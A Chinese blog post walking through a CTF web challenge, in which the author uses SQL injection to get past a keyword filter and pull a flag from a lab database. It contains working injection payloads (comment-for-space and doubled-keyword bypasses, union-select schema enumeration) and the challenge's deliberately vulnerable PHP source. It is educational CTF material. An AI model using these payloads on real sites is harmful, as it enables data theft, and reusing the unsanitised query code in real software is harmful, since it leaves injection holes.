2020-11-29

最新推荐文章于 2022-01-28 23:12:42 发布
最新推荐文章于 2022-01-28 23:12:42 发布
阅读量279 收藏
点赞数 1
文章标签: unctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Sky_Bird_/article/details/110267116
版权

2020-11-29 题型:web

1.打开网站后看到如图

在这里插入图片描述
这个界面是动态网页,右边控制台可以调节一些星点配置。
看的时间长了可能会头晕(哈哈物理攻击

2.看到界面上有where flag??????

然后仔细看的话会发现左下边会有一个图片logo.png
在这里插入图片描述这个图是故意暴露题型的web 中的SQL注入
(点开这个图片是一个素材网站,你懂得)

4.但是是否存在SQL注入呢,判断一下

首先了解一下
(字符型和数字型最大的一个区别在于,数字型不需要单引号来闭合,而字符串一般需要通过单引号来闭合的。)
输入:?id=1后界面正常显示 ?id=1'后界面不显示
表明是数字型注入

5.然后开始SQL注入查询字段数

?id=1/**/ororderder/**/by/**/3

在这里插入图片描述
(因为正常的查询不行,猜测过滤,order空格过滤了)
{尝试使用多行注释符(块注释符)
一对英文括号、换行符、加号来代替空格。快注释符/**/}
因为3这字段数有回显,然而4这没有
通过多次尝试有三个字段

6.查询那个字段有回显

?id=1/**/unIon/**/selEct/**/1,2,3

在这里插入图片描述
如图所示,2,3位是回显位
(这里把unionselect空格过滤了,详情向下见源码)

7.查询数据库名

?id=1/**/uNion/**/Select/**/1,2,database()

在这里插入图片描述
查到数据库名为 text

8.查询表名

?id=1/**/uNion/**/Select/**/1,2,group_concat(table_name)/**/frofromm/**/information_schema.tables/**/where/**/table_schema='text'

(过滤有点严重)
在这里插入图片描述
查询到表名flaguser
注意:
出题时看花了眼,from和form傻傻分不清楚

9.查询列表名

?id=1/**/uNion/**/Select/**/1,2,column_name/**/frofromm/**/information_schema.columns/**/where/**/table_name='flag'

在这里插入图片描述
列表名为 idflag
(说明flag表名中有两个列表名,真flag应该在flag列表名中)

10.查询字段名

?id=1/**/uNion/**/Select/**/1,2,flag/**/frofromm/**/flag

在这里插入图片描述

11.得到flag{You have successfully!!!}

有点烧脑

附源码

<?php
$con=new mysqli("127.0.0.1","root","admin","test");
if(!$con){
    die('数据库连接失败');
}
error_reporting(0);
if(isset($_GET['id']))
{
    $id=$_GET['id'];
    $regex1="/union/";
    $regex2="/select/";
	$regex3="/from/i";
	$regex4="/ /i";
	$regex5="/order/i";
    if(preg_match($regex1, $id)){
        echo "<font size='5'/>where flag???";
        echo "<br>";
    }
    if(preg_match($regex2, $id)){
        echo "<font size='5'/>where flag???";
        echo "<br>";
    }
	if(preg_match($regex3, $id)){
        echo "<font size='5'/>where flag???";
        echo "<br>";
    }
	if(preg_match($regex4, $id)){
        echo "<font size='5'/>where flag???";
        echo "<br>";
    }
	if(preg_match($regex5, $id)){
        echo "<font size='5'/>where flag???";
        echo "<br>";
    }
    $id=preg_replace('/union/','5',$id);  
    $id=preg_replace('/select/','5',$id);
	$id=preg_replace('/from/','',$id);
	$id=preg_replace('/ /','',$id);
	$id=preg_replace('/order/','',$id);
    $result=$con->query("SELECT * FROM user WHERE id=$id");
    while($row=mysqli_fetch_array($result))
    {
        echo '<font size="5"/>这是啥???'. $row['useranme'];
        echo "<br>";
        echo '这是啥???' .$row['passwd'];
        echo "<br>";
    }
}
else {
    echo "<font size='5'/>where flag??????";
    echo "</br>";
    echo "</br>";
    echo "</br>";
}
?>
Sky_Bird_
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CVE-2020-0796漏洞复现
快吃小蛋糕吧的博客
11-08 1945
即17年永恒之蓝后,又爆出永恒之黑,445不愧是安全工程师的噩梦。 漏洞简介 Microsoft Windows和Microsoft Windows Server都是美国微软(Microsoft)公司的产品。Microsoft Windows是一套个人设备使用的操作系统。Microsoft Windows Server是一套服务器操作系统。Server Message Block是其中的一个服务器信息传输协议。 Microsoft Server Message Block 3.1.1 (SMBv3)版本.
LabVIEW 2017运行环境安装包 2020-11-29 by ZDD(1).zip
05-19
ZDD PC-TOOL台式万用表联机统计软件的安装包运行环境(非完整2017),带上zdd pc-tools啊安装,安装完要用另外下载的完整的zdd pc-tool拷贝到目录,好像缺了些ini导致面板无法显示什么的。主要是运行环境。...
Bugku CTF 每日一题 where is flag
彼岸花苏陌的博客
01-28 2900
where is flag 番外篇 解压得到两个压缩包 第一个压缩包key可以解压 第二个压缩包出师表要密码才能解压 打开第一个压缩包解压发现出师表中有些残缺,比如 先帝创业未办AAAAA 而且下一段也接不上 而且有些有aaa啥的有些又没有,于是想到是不是凑字数?于是看了一下长度在这里发现了异常(用360解压不行,用的winrar) 前面的减去后面的 353-278=75 284-183=101 315-194=121 238-180=58 331-241=90 351-247=104 316-199=
2020-07-07
北漂猿
07-07 760
2020-11-29:手写代码:堆排序。
福大大架构师每日一题
11-29 4279
福哥答案2020-11-29: 1,先让整个数组都变成大根堆结构,建立堆的过程: 1)从上到下的方法,时间复杂度为O(NlogN)。 2)从下到上的方法,时间复杂度为O(N)。 2,把堆的最大值和堆末尾的值交换,然后减少堆的大小之后,再去调整堆,一直周而复始,时间复杂度为O(NlogN)。 3,堆的大小减小成0之后,排序完成。 golang代码如下: package class04 import ( "fmt" "testing" ) /* 堆排序 1,先让整个数组都变成大根堆结构,建立
2020-05-10
zcz19920114的博客
05-10 1187
本人camera hal小白,无从下手有没有camera hal 的大佬可以指点一下或者提供一点资料,在此谢了
2020-05-31
GJJailang的博客
05-31 885
现在后端不做云计算,大数据,人工智能,底层程序员是不是只剩增删改查了。感觉自己混了两年混成运维了。
2020-03-14
东哥的博客
03-14 1005
<% } %> 这个怎么改成随机
2020-04-10
m0_46591785的博客
04-10 2342
Super关键字 可以访问父类中定义的属性 可以调用父类中定义的成员方法 可以在子类构造器中调用父类构造器 .子类所有的构造器默认都访问父类中空参数的构造器 .子类一定会调用父类构造器(默认过程调用无参) //如果没有显示定义构造方法,Java编译阶段提供一个默认构造方法 //如果定义了自己的构造器,Java使用自己的构造器 //父类所有的构造器:子类必须实现它,子类默认当中一定使用到了父类的构造...
前端时间格式2020-11-18T22:42:48.000+00:00 转化成正常格式
热门推荐
技术老鸟
12-01 1万+
实体类加上注解 @JsonFormat(shape=JsonFormat.Shape.STRING,pattern="yyyy-MM-dd HH:mm:ss",timezone="GMT+8") private Date chargeTime; 结果: 2020-11-19 06:42:18
将时分秒的时间转为2020-11-12T20:00:00.000+08:00格式
12-29 2344
java中将时分秒的时间转为2020-11-12T20:00:00.000+08:00格式 /** * @Description: 将2020-11-12T20:00:00.000+08:00 转换为2020-11-12 20:00:00 * @Author: ljj * @CreateDate: 2020/11/26 14:30 * @UpdateUser: * @UpdateDate: * @UpdateReakem * @pa
中国第三方支付行业发展趋势展望2020 2020-11-29.rar
09-10
中国第三方支付行业发展趋势展望2020 2020-11-29.rar
中国第三方支付行业发展趋势展望2020 2020-11-29.pdf
04-08
中国第三方支付行业发展趋势展望2020 2020-11-29.pdf
flutter-koa2-du:Flutter 1.12.13 + Koa2.13.0实现跨端《独APP》最近更新2020-11-29
02-03
此项目目前正在开发阶段(最近更新2020-11-29)采用的技术栈是koa2 + flutter ;重心在代码的开发,文档会先放一放。完全是自定义的臆想出来的一个跨端的app。 ta主要用于发表一些心情等等,包含登录注册等,主要的...
2020-10-29
03-02
这个标签为"Java"的压缩包文件,名为"2020-10-29-main",可能包含了丰富的Java学习资源,旨在帮助初学者和有经验的开发者提升技能。 Java的基础部分包括以下几个关键知识点: 1. **Java语法**:Java语言的结构严谨...
大学生挑战杯-喜树根器官培养和抗癌物质喜树碱生成的研究.rar
07-26
大学生挑战杯-喜树根器官培养和抗癌物质喜树碱生成的研究.rar
b278视频及游戏管理平台-springboot+vue.zip(可运行源码+sql文件+)
07-26
视频及游戏管理平台是一个很好的项目,结合了后端(Spring Boot)和前端(Vue.js)技术,实现了前后端分离。 视频及游戏管理平台是一个很好的项目,结合了后端(Spring Boot)和前端(Vue.js)技术,实现了前后端分离。 视频及游戏管理平台是一个很好的项目,结合了后端(Spring Boot)和前端(Vue.js)技术,实现了前后端分离。 视频及游戏管理平台是一个很好的项目,结合了后端(Spring Boot)和前端(Vue.js)技术,实现了前后端分离。 视频及游戏管理平台是一个很好的项目,结合了后端(Spring Boot)和前端(Vue.js)技术,实现了前后端分离。 视频及游戏管理平台是一个很好的项目,结合了后端(Spring Boot)和前端(Vue.js)技术,实现了前后端分离。
大模型应用-为Ollma开发的简单的HTML网页UI应用-附项目源码-优质项目实战.zip
最新发布
07-26
大模型应用_为Ollma开发的简单的HTML网页UI应用_附项目源码_优质项目实战
基于JAVA局域网监听软件的设计与开发(源代码+论文).rar
07-26
基于JAVA局域网监听软件的设计与开发(源代码+论文).rar
创建一个以“2020-01-02”开始且包含10个星期六的series(提示:freq参数可设置为:'w-sat')
06-06
1 2020-01-11 2 2020-01-18 3 2020-01-25 4 2020-02-01 5 2020-02-08 6 2020-02-15 7 2020-02-22 8 2020-02-29 9 2020-03-07 dtype: datetime64[ns] ``` 其中,`pd.date_range()`函数用于生成日期序列,参数`start`...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值